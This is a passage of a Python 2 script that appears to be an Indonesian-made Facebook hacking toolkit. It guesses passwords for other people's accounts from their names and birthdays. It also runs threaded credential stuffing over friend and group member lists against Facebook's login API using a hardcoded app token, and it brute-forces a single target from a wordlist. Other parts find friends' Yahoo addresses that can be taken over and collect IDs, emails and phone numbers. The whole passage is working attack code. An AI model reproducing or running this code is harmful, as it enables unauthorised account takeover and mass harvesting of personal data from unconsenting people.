raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3
else:
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4
else:
pass5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass5
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass5
else:
pass6 = ('sayangku')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass6
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass6
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mAre you sure want to make wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Please choice \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Please choice \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mnot found'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
